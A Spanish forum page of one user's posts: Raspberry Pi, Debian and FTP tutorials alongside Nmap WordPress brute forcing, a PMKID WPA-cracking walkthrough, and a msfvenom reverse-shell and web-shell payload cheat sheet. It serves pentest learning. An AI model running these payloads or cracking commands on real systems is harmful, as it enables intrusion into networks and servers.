Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.


Temas - puntoCL

Páginas: [1] 2 3
1
Hacking / Pruebas de vulnerabilidad de WordPress con Nmap
« en: Noviembre 11, 2018, 11:25:17 pm »
Navegando por el internet me encontré con esto. Lo encontré interesante.

Nmap es una herramientas cuando se trata de pruebas de seguridad (excepto en WPScans.com). Nmap fue creado en 1997 por Gordon Lyon alias Fyodor. La versión actual 7.60 contiene aproximadamente 580 scripts NSE diferentes (Nmap Scripting Engine) utilizados para diferentes comprobaciones de seguridad o recopilación de información y aproximadamente seis de ellos están relacionados con WordPress.

Nuestra primera prueba es usar las opciones predeterminadas en nmap y ver qué puertos están abiertos:



Por cierto, estamos usando la asombrosa penetración de pruebas de la distribución Kali Linux. La captura de pantalla anterior muestra que hay un servidor web, un servidor ssh y MySQL escuchando en la red. Exponer MySQL a la red no es realmente seguro, no es el objetivo esta vez.

Los siguientes scripts de Nmap NSE están directamente relacionados con WordPress:

  • http-wordpress-users.nse
  • http-wordpress-enum.nse
  • http-wordpress-brute.nse
  • http-vuln-cve2017-1001000.nse
  • http-vuln-cve2014-8877.nse

Cuando ejecutamos nuestra segunda prueba, nos centramos en el servidor web y utilizamos el argumento -A para Nmap para habilitar el escaneo de scripts:



De la captura de pantalla anterior notamos que la secuencia de comandos http-generator muestra la versión de WordPress, y en este caso 4.8.2.

Ahora es el momento para el trabajo pesado: ejecutar los scripts de WordPress. Podemos empezar añadiendo el

Código: [Seleccionar]
--script
argumento como el de abajo. Sea como sea, esto puede tomar algún tiempo para terminar, en nuestro caso de prueba nos llevó aproximadamente 12 minutos:



¡Ahora estamos hablando! Esto se ve bien, vamos a interpretar los resultados identificados Nmap. Tres temas diferentes y nueve plugins diferentes con las versiones correspondientes. También podemos leer que solo se buscan los 100 mejores temas / complementos en el complemento http-wordpress-enum.

Este tipo de escaneo de fuerza bruta es muy ruidoso y los archivos de registro del servidor web de destino se parecen a esto:



Podemos ajustar los tiempos con el argumento -T5 para ejecutar un escaneo más lento. Y para cambiar el User-Agent para que el hecho de informarle a nuestro host escaneado que estamos ejecutando Nmap se pueda cambiar así:

Código: [Seleccionar]
--script-args http.useragent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36"

Además, podemos cambiar el número de complementos o temas para verificar usando los siguientes argumentos:

Código: [Seleccionar]
--script-args search-limit=5000
También también podemos ajustar para enumerar sólo para temas:

Código: [Seleccionar]
--script-args type="themes"
En nuestra instalación de Nmap con Kali Linux, Nmap puede verificar 4778 temas y 50553 complementos:

Código: [Seleccionar]
$ wc -l /usr/share/nmap/nselib/data/wp-themes.lst
4778 /usr/share/nmap/nselib/data/wp-themes.lst

$ wc -l /usr/share/nmap/nselib/data/wp-plugins.lst
50553 /usr/share/nmap/nselib/data/wp-plugins.lst

Finalmente me gustaría dirigirme al bruteforcer de inicio de sesión. En la captura de pantalla anterior, podemos ver que el script NSE http-wordpress-brute.nse descubrió que el administrador de inicio de sesión tiene la contraseña de administrador.

El bruteforcer también tiene algunos argumentos para usar:

Código: [Seleccionar]
--script-args 'userdb=users.txt,passdb=passwds.txt,http-wordpress-brute.hostname=domain.com, http-wordpress-brute.threads=3,brute.firstonly=true' <target>

Como puede ver, los argumentos son bastante autoexplicativos, puede establecer subprocesos, lista de usuarios para usar y base de datos de contraseñas.

Si está buscando una contraseña grande o una lista de usuarios, recomendaría SecLists en Github:

https://github.com/danielmiessler/SecLists

FUENTE: https://blog.wpscans.com/wordpress-vulnerability-testing-wordpress-with-nmap/




























2


En este pequeño proyecto vamos a ocupar la raspberry pi 3 b y lo vamos a conectar a un módulo de 4 relé y lo estaremos controlando a través de una página web apache de forma local. Los códigos estaré en GitHub lo cual los códigos estarán comentando y esto en raspbian.


Que nececitamos

- Raspberry pi 3
- Módulo de relé de 4 matrices
- 6 jumper hembra o más conocido como cable gpio
- Wifi
- SSH



Raspbian

Dejo un video para saber cómo se instala raspbian a la raspberry





El Armado

Primero vamos a ver que GPIO vamos a ocupar. Si no saben que es el GPIO pueden ver la imagen para saber a qué nos referimos.



Entonces estaríamos ocupando los siguientes números de pines.

4 - 5v
6 - GND "Tierra"
8 - GPIO 14
10 - GPIO 15
11 - GPIO 17
12 - GPIO 18

Explicare los pines del relé



Como vieron la imagen el relé tiene 6 pines lo cual que vamos a conectar a la raspberry

VCC - Es al que vamos a conectar a los 5v
GND - Tierra
IN4 - Este pin controla el relé 4
IN3 - Este pin controla el relé 3
IN2 - Este pin controla el relé 2
IN1 - Este pin controla el relé 1

Ahora tenemos que conectarlos le voy a dejar una tabla para identificar como voy a conectar los pines

--------------------------
 Raspberry | RELE
--------------------------
    PIN 4     | VCC   
--------------------------
    PIN 6     | GND
--------------------------
    PIN 8     | IN4
--------------------------
    PIN 10   | IN3
--------------------------
    PIN 11   | IN2
--------------------------
    PIN 12   | IN1
--------------------------

o más bien en esta imagen





Testeo

ante de testeo actualizaremos nuestra raspbian

apt-get update && apt-get upgrade

Ahora vamos a testear si esta todo conectado con este código, que está en python.

https://github.com/puntoCL/Rele-4/blob/master/test.py

en la consola escribimos sudo nano test.py y pegamos el código y para ejecutarlo escribimos sudo python test.py

Entonces lo que hace esto es un conteo de apagado y encendido un barrido.





Version WEB

Ahora vamos a controlar el relé en una página WEB

Primero tenemos que instalar apache y php

sudo apt-get install apache2 -y

sudo apt-get install php7.0 libapache2-mod-php7.0 -y

Ante de iniciar el servicio apache tenemos que otorgar permisos. Los directorios, utilizados por un servidor web en linux se sitúan en /var/www, y el usuario típico para dicho entorno suele ser www-data. Ahora vamos a crear el grupo y usuario estándar para nuestro servidor, a la par que otorgamos los permisos pertinentes y añadimos a nuestro usuario por defecto (pi) al grupo comentado. De esta forma no será preciso que el usuario root (su) sea siempre el que pueda operar en /var/www.

Comenzamos cambiando el usuario y el grupo al directorio:

sudo chown www-data:www-data /var/www/

Damos los permisos a la carpeta www/:

sudo chmod 775 /var/www/

Agregamos el usuario pi al grupo www-data:

sudo usermod -a -G www-data pi

y reiniciamos el servicio apache sudo service apache2 restart

El codigo php y python esta en github: https://github.com/puntoCL/Rele-4

cd /var/www/html
git clone https://github.com/puntoCL/Rele-4.git

y no vamos nuestra página local y probamos con pagar y encender los relés y si funciona y todo está todo bien lo vamos a conectar a una lampara.

Cada relé tiene 3 salida y nosotros vamos a ocuparlo solamente 2 primeros el tercero se ocupa cuando se hace una conexión con un interruptor mecánico en caso cuando no tenemos un PC o un celular a mano.



en mi caso quedara algo a si.. ojo para hacer esta conexión procuren que la lampara no esté conectado a la corriente es totalmente peligroso



da lo mismo cuál de los 2 cable deben ocupar le dejo un diagrama para que lo entiendan mejor



lo enchufan a la corriente y listo







3
Seguridad Wireless / Nuevo ataque a WPA/WPA con PMKID
« en: Agosto 06, 2018, 07:44:40 pm »
En este escrito, describiré una nueva técnica para descifrar contraseñas WPA PSK "Clave precompartida" (Pre-Shared Key).

Para hacer uso de este nuevo ataque necesita las siguientes herramientas:


Este ataque fue descubierto accidentalmente mientras buscaba nuevas formas de atacar el nuevo estándar de seguridad WPA3. WPA3 será mucho más difícil de atacar debido a su moderno protocolo de establecimiento de claves denominado "Simultaneous Authentication of Equals" (SAE).

La principal diferencia con los ataques existentes es que en este ataque, no se requiere la captura de un EAPOL completo de 4 vías. El nuevo ataque se realiza en RSN IE (Elemento de información de red de seguridad robusta) de un único marco EAPOL.

En este momento, no sabemos para qué proveedores o cuántos enrutadores funcionará esta técnica, pero creemos que funcionará contra todas las redes 802.11i/p/q/r con funciones de itinerancia habilitadas (la mayoría de los enrutadores modernos).

Las principales ventajas de este ataque son las siguientes:

  • No se requieren más usuarios regulares, porque el atacante se comunica directamente con el AP (también conocido como ataque "sin cliente")
  • No más esperando un handshake completo de 4 vías entre el usuario regular y el AP
  • No más retransmisiones eventuales por EAPOL frames (lo que puede llevar a resultados imposibles de descifrar)
  • No más contraseñas eventuales no válidas enviadas por el usuario habitual
  • No más perdidas de EAPOL frames cuando el usuario regular o el AP está demasiado lejos del atacante
  • No se requiere fixing y replaycounter (lo que resulta en velocidades ligeramente más altas)
  • o más formato de salida especial (pcap, hccapx, etc.) - los datos finales aparecerán como una cadena codificada hexagonal regular



Detalles de ataque:

El RSN IE es un opcional campo que se puede encontrar en  802.11 Trama de gestión. Una de las capacidades de RSN es el PMKID.



El PMKID se calcula utilizando HMAC-SHA1 donde la clave es PMK y la parte de datos es la concatenación de una etiqueta de cadena fija "PMK Name", la dirección MAC del punto de acceso y la dirección MAC de la estación.

Código: [Seleccionar]
PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)
Como el PMK es el mismo que en un handshake EAPOL regular de 4 vías, este es un vector de ataque ideal.

Recibimos todos los datos que necesitamos en el primer marco de EAPOL del AP.



Mano a la obra:

1. Ejecute hcxdumptool para solicitar el PMKID desde el AP y para dump el frame recibido en un archivo (en formato pcapng).

Código: [Seleccionar]
./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status

Salida

Código: [Seleccionar]
start capturing (stop with ctrl+c)
INTERFACE:...............: wlp39s0f3u4u5
FILTERLIST...............: 0 entries
MAC CLIENT...............: 89acf0e761f4 (client)
MAC ACCESS POINT.........: 4604ba734d4e (start NIC)
EAPOL TIMEOUT............: 20000
DEAUTHENTICATIONINTERVALL: 10 beacons
GIVE UP DEAUTHENTICATIONS: 20 tries
REPLAYCOUNTER............: 62083
ANONCE...................: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69

Si un AP recibe nuestro paquete de solicitud de asociación y admite el envío de PMKID, veremos un mensaje "FOUND PMKID" después de un momento:

Código: [Seleccionar]
[13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e <ESSID> [ASSOCIATIONREQUEST, SEQUENCE 4]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID]

Nota: En función del ruido en el canal wifi, puede llevar un tiempo recibir el PMKID. Recomendamos ejecutar hcxdumptool hasta 10 minutos antes de abortar.


2. Ejecute hcxpcaptool para convertir los datos capturados del formato pcapng a un formato hash aceptado por hashcat.

Código: [Seleccionar]
./hcxpcaptool -z test.16800 test.pcapng
Salida

Código: [Seleccionar]
start reading from test.pcapng

summary:
--------
file name....................: test.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.17.11-arch1
file application information.: hcxdumptool 4.2.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 66
skipped packets..............: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 17
probe requests...............: 1
probe responses..............: 11
association requests.........: 5
association responses........: 5
authentications (OPEN SYSTEM): 13
authentications (BROADCOM)...: 1
EAPOL packets................: 14
EAPOL PMKIDs.................: 1

1 PMKID(s) written to test.16800

El contenido del archivo escrito se verá así:

Código: [Seleccionar]
2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a

Las columnas son las siguientes (todas codificadas con hexadecimal):

  • PMKID
  • MAC AP
  • MAC Station
  • ESSID

Nota: Aunque no es obligatorio, se recomienda utilizar las opciones -E -I y -U con hcxpcaptool. Podemos usar estos archivos para alimentar hashcat. Por lo general, producen buenos resultados.

  • -E recupera posibles contraseñas del tráfico WiFi (adicional, esta lista incluirá ESSID)
  • -I Recobro identidades del tráfico WiFi
  • -U Recupe los nombres de usuario del tráfico WiFi

Código: [Seleccionar]
./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng
3. Ejecute hashcat para descifrarlo.

Básicamente podemos atacar este hash como cualquier otro tipo de hash. El modo hash que debemos usar es 16800.

Código: [Seleccionar]
/hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
Salida

Código: [Seleccionar]
hashcat (v4.2.0) starting...

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 1080, 2028/8112 MB allocatable, 20MCU
* Device #2: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
* Device #3: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
* Device #4: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt
* Brute-Force
* Slow-Hash-SIMD-LOOP

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Watchdog: Temperature abort trigger set to 90c

2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a:hashcat!

Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: 2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf...a39f3a
Time.Started.....: Thu Jul 26 12:51:38 2018 (41 secs)
Time.Estimated...: Thu Jul 26 12:52:19 2018 (0 secs)
Guess.Mask.......: ?l?l?l?l?l?lt! [8]
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:   408.9 kH/s (103.86ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#2.....:   408.6 kH/s (104.90ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#3.....:   412.9 kH/s (102.50ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#4.....:   410.9 kH/s (104.66ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#*.....:  1641.3 kH/s
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 66846720/308915776 (21.64%)
Rejected.........: 0/66846720 (0.00%)
Restore.Point....: 0/11881376 (0.00%)
Candidates.#1....: hariert! -> hhzkzet!
Candidates.#2....: hdtivst! -> hzxkbnt!
Candidates.#3....: gnxpwet! -> gwqivst!
Candidates.#4....: gxhcddt! -> grjmrut!
HWMon.Dev.#1.....: Temp: 81c Fan: 54% Util: 75% Core:1771MHz Mem:4513MHz Bus:1
HWMon.Dev.#2.....: Temp: 81c Fan: 54% Util:100% Core:1607MHz Mem:4513MHz Bus:1
HWMon.Dev.#3.....: Temp: 81c Fan: 54% Util: 94% Core:1683MHz Mem:4513MHz Bus:1
HWMon.Dev.#4.....: Temp: 81c Fan: 54% Util: 93% Core:1620MHz Mem:4513MHz Bus:1

Started: Thu Jul 26 12:51:30 2018
Stopped: Thu Jul 26 12:52:21 2018

También hay soporte para hash-mode 16801, que permite omitir el cálculo de PMK, que es el cálculo que hace que craquear WPA sea tan lento. Precomputar PMK puede ser útil en casos en los que se encuentre en el sitio y no pueda transferir un hash a una plataforma de craqueo remoto debido a una NDA. El objetivo es ejecutar hashcat en su computadora portátil que puede llevar al sitio.

El modo 16801 espera una lista de PMK precalculados, como cadenas codificadas hexadecimales de longitud 64, como la lista de palabras de entrada. Para precalcular los PMK, puede usar la herramienta hcxkeys. Las herramientas hcxkeys requieren el ESSID, por lo que debe solicitar el ESSID de su cliente con anticipación.



Fuente: https://hashcat.net/forum/thread-7717.html

4


Project Neto es un paquete de Python 3 concebido para analizar y desentrañar las características ocultas de los complementos y extensiones de navegadores conocidos como Firefox y Chrome. Automatiza el proceso de descomprimir los archivos empaquetados para extraer estas características de recursos relevantes en una extensión como manifest.json, carpetas de localización o archivos fuente de JavaScript y HTML.



Instalación

instalar el paquete, el usuario puede elegir pip3.
Código: [Seleccionar]
pip3 install -e . --user
Opcionalmente, también se puede instalar con privilegios de administrador usando sudo:
Código: [Seleccionar]
sudo pip3 install -e .
Una instalación exitosa se puede verificar usando:
Código: [Seleccionar]
python3 -c "import neto; print(neto.__version__)"


Inicio rápido

Para realizar el análisis de una extensión, el analista puede escribir lo siguiente:
Código: [Seleccionar]
neto analysis -u https://yoururl.com/extension-name.xpi
La extensión se descargará automáticamente y se descomprimirá de forma predeterminada en la carpeta temporal del sistema.

Sin embargo, el analista también puede lanzar un análisis hacia una extensión almacenada localmente:
Código: [Seleccionar]
neto analysis -e ./my-extension-name.xpi
Después de realizar el análisis estático, generará un archivo Json que se almacena de manera predeterminada en una carpeta recién creada llamada output.

Si usa Python, también puede importar el paquete como una biblioteca en sus propios módulos de Python:
Código: [Seleccionar]
>>> from neto.lib.extensions import Extension
>>> my_extension = Extension ("./sample.xpi")
>>> my_extension.filename
'adblock_for_firefox-3.8.0-an+fx.xpi'
>>> my_extension.digest
'849ec142a8203da194a73e773bda287fe0e830e4ea59b501002ee05121b85a2b'

Además de acceder a los elementos que se encuentran en la extensión que usa propiedades, el analista siempre puede tener acceso a ella como un diccionario:

Código: [Seleccionar]
>>> my_extension.__dict__
{'_analyser_version': '0.0.1', '_digest': '849ec142a8203da194a73e773bda287fe0e830e4ea59b501002ee05121b85a2b'…

Si no está usando Python, puede usar el daemon JSON RPC:
Código: [Seleccionar]
$ neto daemon

         ____            _           _      _   _      _
        |  _ \ _ __ ___ (_) ___  ___| |_   | \ | | ___| |_ ___
        | |_) | '__/ _ \| |/ _ \/ __| __|  |  \| |/ _ \ __/ _ \
        |  __/| | | (_) | |  __/ (__| |_   | |\  |  __/ || (_) |
        |_|   |_|  \___// |\___|\___|\__|  |_| \_|\___|\__\___/
                      |__/

                                    Developed by @ElevenPaths
                                    Version: 0.5.0b


 * Running on http://localhost:14041/ (Press CTRL+C to quit)

A continuación, puede ejecutar comandos utilizando su biblioteca JSON RPC preferida para escribir un cliente (hemos escrito una breve demostración en la carpeta bin) o incluso curl:
Código: [Seleccionar]
curl --data-binary '{"id":0, "method":"remote", "params":["https://example.com/myextension.xpi"], "jsonrpc": "2.0"}'  -H 'content-type:text/json;' http://localhost:14041



Caracteristicas

La siguiente es una lista no exhaustiva de las características incluidas en este paquete son las siguientes:

  • Análisis manifiesto
  • Hash de archivo interno.
  • Extracción de entidades con expresiones regulares: direcciones IPv4, correo electrónico, criptomonedas, URL, etc.
  • Extracción de comentarios de HTML, CSS y archivos JS.
  • Motor de detección de cryptojacking basado en dominios y expresiones de minería conocidas.
  • Detección de código Javascript sospechoso como eval ().
  • Análisis de certificado si se proporciona.
  • Análisis por lotes de extensiones previamente descargadas.



Descargar Neto

https://github.com/elevenpaths/neto




5
GNU/Linux / Instalado debian 9
« en: Julio 05, 2018, 07:36:25 pm »




En esta instalación para que sea fácil y básica, vamos a elegir la instalación grafica así que le damos enter donde dice Graphical install




SELECCIÓN DE IDIOMAS

Nos pedirá el idioma en este seleccionaremos español y como debian esta en ingles tendremos que buscar la palabra “spanish”




SELECCIÓN DE UBICACION

Después, deberá seleccionar la localización geográfica. Basada en el idioma que seleccionamos anterior mente. Si no encuentra tu país selecciona other:



Indicamos el nombre del equipo como por ejemplo “Servidor-FTP” o “srv-debian” o “servido web” como quieran esto dependerá a que lo vas a usar, el nombre se conectara al sistema de la red a si que cuando se conecte a una red ese nombre va a tener como host.

CONFIGURAR LA RED



Iniciamos el nombre de dominio. Debe emplearse un dominio inexistente, como “casa-red” o “home-lan”. No se pueden utilizar nombres de dominios que existan en internet como “google.com” o “linux.org”, para evitar problemas en la resolución de los nombres. En caso si no saben o si no lo van a ocupar lo pueden dejar en blanco.



CONFIGURAR USUARIOS Y CONTRASEÑAS

Acá le daremos la contraseña al usuario ROOT



Ahora tenemos que crear un usuario normal. Ósea una cuenta si privilegio. Entonces no pedirá el nombre completo del usuario



El nombre del usuario para la cuenta, se refiere el nombre a la cual va a logear.



Y luego le daremos una contraseña.



Configuración del reloj

Elegir nuestra zona horaria



Particiones

Particionado guiado: Permite crear, de una manera sencilla y rápida, las particiones de acuerdo a nuestro plan

En este caso no vamos hacer una partición vamos a instalar debian en todo el disco duro.



Y después hacemos entender en Guiado – utilizar todo el disco duro



No aparecerá el disco duro en la cual vamos a instalar debian, en caso si tuviéramos dos discos duros saldría dos discos a seleccionar y elegimos que disco vamos instalar debian.



En la selección de partición seleccionamos directo en todos los ficheros en una partición (recomendado para novatos) “Para ahorrar configuraciones”



No mostrara las particiones del disco como va quedar y si estamos conforme le damos enter en finalizar el particionado y escribir los cambios en el disco



Nos pedirá si deseamos escribir los cambios en el disco nuevamente. Obviamente le damos que SI



Ahora el equipo se estará instalando

CONFIGURACION EL GESTOR DE PAQUETES

En la mitad de la instalación nos pedirá un cd o dvd para instalar los paquetes, pero como no tenemos no lo va hacer por internet con un apt y le damos que no.



Como vamos a hacer un apt para actualizar el nuestro debian tenemos que seleccionar los servidores se recomienda elegir los servidores de su país, pero hay gente que dice que ocupen los servidores de estados unidos porque son más rápido cada uno con su gusto.



y una vez seleccionado el país seleccionaremos el servidor de nuestro país



Si tiene quiere utilizar proxy pueden escribir su información, pero en caso si no tienen dejen en blanco.



Y esperar nuestro debian se estará actualizando esto dependerá nuestra velocidad de internet o la velocidad del servidor



una vez ya actualizado la instalación seguirá su rumbo y se estará instalando los programas.



Configuración de popularity-constest

no preguntara si queremos participar en una encuesta según el uso de paquete para sacar estadística acá es su gusto. Yo le voy a dar que no



SELECCIÓN DE PROGRAMAS

seleccionaremos el entorno grafico de escritorio acá cada uno con su gusto y instalar algunos servicios como apache y ssh, En mi caso ocupare GNOME, WEB SERVER Y SSH SERVER



En la gestión de arranque le damos que sí. Ya que nuestro sistema operativo solamente esta en este disco. En caso si tuviéramos Windows y Linux o dos Linux en el disco le damos que no



Ahora no mostrará nuestro disco duro en este caso mi disco seria /dev/sda si tuviera más disco aparecerá /dev/sdb, /dev/sdc. En caso si no aparece nuestro disco van directo a Introducir el dispositivo manualmente y escribiríamos la partición donde queremos donde si instale como ejemplo /dev/sda1, /dev/sda2, /dev/sda3 etc..



Y listo nuestro debian esta instalado. Hacemos clic en continuar y el equipo se reiniciará



Como pueden ver tiene dos opciones que sería el arranque normal de debian y el otro es opciones de arranque avanzado por decir, tienes 5 segundos si pasa después de los 5 segundos el sistema automáticamente arranca en modo normal.



En las opciones avanzadas no muestra dos opciones el arranque normal y el arranque en modo seguro “recovery mode” este sirve para reparar nuestro debian



Ya una vez arrancado nos pedirá el usuario por defecto estará con el usuario que ya hemos creado en la instalación el que no tiene privilegio, escribimos la contraseña y listo



Ya pueden disfrutar nuestro debian




6
GNU/Linux / Instalación y configurar servidor FTP "vsftpd" en Debian
« en: Mayo 25, 2018, 02:53:08 am »

wikipedia: Protocolo de transferencia de archivos (en inglés File Transfer Protocol o FTP). Es un protocolo de red para la transferencia de archivos entre sistemas conectados a una red TCP, basado en la arquitectura cliente-servidor. Desde un equipo cliente se puede conectar a un servidor para descargar archivos desde él o para enviarle archivos, independientemente del sistema operativo utilizado en cada equipo.

Servidor FTP: Un servidor FTP es un programa especial que se ejecuta en un equipo servidor normalmente conectado a Internet (aunque puede estar conectado a otros tipos de redes, LAN, MAN, etc.). Su función es permitir el intercambio de datos entre diferentes servidores/ordenadores.

vsftpd: o daemon FTP muy seguro, es un servidor FTP para sistemas tipo Unix, incluido Linux. Está licenciado bajo la Licencia Pública General de GNU. Es compatible con IPv6 y SSL.




Voy a explicar cómo instalar y configurar un servidor FTP en una máquina Debian.

Primero tenemos que instalar el paquete vsftpd y para eso escribimos en la consola lo siguiente:
Código: [Seleccionar]
apt-get install vsftpd
Lo segundo es configurar el vsftpd que está en /etc/vsftpd.conf y descomentamos las opciones siguientes quitado el gato "#"
Código: [Seleccionar]
nano /etc/vsftpd.conf
Entonces buscaremos las siguiente opciones.

write_enable=YES  || En esta sirve para que los usuarios tenga permiso de escritura en otras palabras pueda subir archivos.

chroot_local_users=YES || Que los usuarios estén enjaulados en su directorio "carpeta" FTP - /home

chroot_list_enable=YES || Que los usuarios estén enjaulados en su directorio "carpeta" FTP - /home

chroot_list_file=/etc/vsftpd.chroot_list  || Opción para enjaular a los usuarios en su carpeta /home y para esto tenemos que agregar una opcion para mas allow_writeable_chroot=YES para dar el permiso de escritura.

En la opción chroot_list_file=/etc/vsftpd.chroot_list nos indica una ruta"/etc/vsftpd.chroot_list" de un archivo que no esta creada entonces como tercer paso es crear el archivo
Código: [Seleccionar]
nano /etc/vsftpd.chroot_listen este archivo tenemos que colocar en cada linea los usuario que NO queremos que sean enjaulados. Osea si escribimos un usuario ejemplo admin entonces cuando el usuario admin se conecte por ftp al servidor tenga el permiso de ver todas la carpeta del servidor y no solo del usuario en si, que seria enjaulado.

y cuando terminemos de configurar tenemos que resetear el servicio vsftpd y para eso en la consola escribimos:
Código: [Seleccionar]
service vsftpd restart
Para parar el servicio
Código: [Seleccionar]
service vsftpd stop
Para activar el servicio
Código: [Seleccionar]
service vsftpd start
Para ver el estado del servicio
Código: [Seleccionar]
service vsftpd status


Y lo ultimo como crear usuarios para el servicio FTP.

Código: [Seleccionar]
useradd usuario1dejar en claro que el "usuario1" lo puse a modo ejemplo usted puede colocar cualquier nombre a su gusto, claro si usted esta trabajando y su usuario se llama juanito perez colocan useradd jperez como ejemplo.

A este usuario le damos una contraseña.
Código: [Seleccionar]
passwd 1234el 1234 es la contraseña

vamos a crear su carpeta en home.
Código: [Seleccionar]
mkdir /home/usuario1
Ahora asignaremos el usuario a la carperta que creamos en home.
Código: [Seleccionar]
usermod -d home/usuario1 usuario1
y ahora tenemos que asignar el usuario al grupo de FTP.
Código: [Seleccionar]
usermod -g ftp usuario1
Tenemos que cambiar el propietario del directorio del usuario que creamos.
Código: [Seleccionar]
chown usuario1/home/usuario1
y cambiar el grupo a FTP
Código: [Seleccionar]
chgrp ftp /home/usuario1
El problema de acá es que estamos creando usuario para el sistema y nuestra idea es crear usuario para que solo se ocupen el servicio FTP y nada mas para eso lo que tenemos que hacer es:
Código: [Seleccionar]
usermod -s /bind/ftp usuario1
entonces el usuario usuario1 no se va a conectar al servidor por que no es usuario de sistema solo es usuario del servicio FTP.

Y eso seria todos Saludos  :P

7




Ahora vamos a crear un simple paylodad con msfvenom con extensión .exe



MSFVENOM: Es un generador de paylodad independiente de metasploit. Esta herramienta es una combinación de msfpayload y msfencode utilizar ambas herramientas en una única instancia. Msfvenom reemplazo tanto msfpayload como msfencode a partir del 8 de junio del 2015.

Si quieres saber un poco más de msfvenom vea el post anterior
https://underc0de.org/foro/hacking/curso-metasploit-part-5-hablemos-de-msfvenom/



Se han preguntado que es reverse y que es bind.

Reverse shell: O shell inverso en español es un tipo de shell en que el equipo víctima se comunica de vuelta con la maquina atacante. La máquina atacante tiene un puerto de escucha en el que recibe la conexión.

bind shell: Tipo de shell en el que la máquina de destino abre un puerto de comunicación o un oyente en la máquina víctima y espera una conexión entrante. Luego, el atacante se conecta al oyente de la máquina víctima, que luego lleva a la ejecución de código o comando en el servidor.




CUANDO USAR UNA REVERSE SHELL??

Si te encuentras en uno de los siguientes escenarios no limitado, entonces deberías considerar usar un shell inverso

  • la máquina de la víctima esta detrás de una red privada diferente.
  • El firewall de la máquina objetivo bloquea los intentos de conexión entrante a su bindshell.
  • tu payload no puede unirse al puerto que deseas debido a cualquier razón.
  • Simplemente no puede decidir que elegir.

Cuando una shell inverso no es necesario

Si puede hacer un backdoor de un servicio existente, es posible que no necesite una shell inverso. Por ejemplo: si la máquina de destino ya está ejecutando un servicio SSH, puede intentar agregarle un nuevo usuario y usarlo.

Si la máquina de destino es un servidor web que admite un lenguaje de programación del lado del servidor, entonces puede dejar una puerta trasera en ese lenguaje. Por ejemplo, muchos servidores Apache soportan PHP, luego puede usar un "shell web" de PHP. Los servidores IIS suelen ser compatibles con ASP o ASP.net. El Metasploit ofrece cargas útiles en todos estos lenguajes.

Lenguajes para crear paylodad necesario


Binarios

Linux
Código: [Seleccionar]
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Tu IP> LPORT=<Tu puerto> -f elf > shell.elf
Windows
Código: [Seleccionar]
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Tu IP> LPORT=<Tu puerto> -f exe > shell.exe
Mac
Código: [Seleccionar]
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Tu IP> LPORT=<Tu puerto> -f macho > shell.macho

Web Payloads

PHP
Código: [Seleccionar]
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Tu IP> LPORT=<Tu puerto> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP
Código: [Seleccionar]
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Tu IP> LPORT=<Tu puerto> -f asp > shell.asp
JSP
Código: [Seleccionar]
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Tu IP> LPORT=<Tu puerto> -f raw > shell.jsp
WAR
Código: [Seleccionar]
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Tu IP> LPORT=<Tu puerto> -f war > shell.war

Scripting Payloads

Python
Código: [Seleccionar]
msfvenom -p cmd/unix/reverse_python LHOST=<Tu IP> LPORT=<Tu puerto> -f raw > shell.py
Bash
Código: [Seleccionar]
msfvenom -p cmd/unix/reverse_bash LHOST=<Tu IP> LPORT=<Tu puerto> -f raw > shell.sh
Perl
Código: [Seleccionar]
msfvenom -p cmd/unix/reverse_perl LHOST=<Tu IP> LPORT=<Tu puerto> -f raw > shell.pl

Shellcode

Para todos los shellcode, consulte 'msfvenom -help-formats' para obtener información sobre los parámetros válidos. Msfvenom dará salida al código que se puede cortar y pegar en este lenguaje para sus exploits.

Linux Based Shellcode
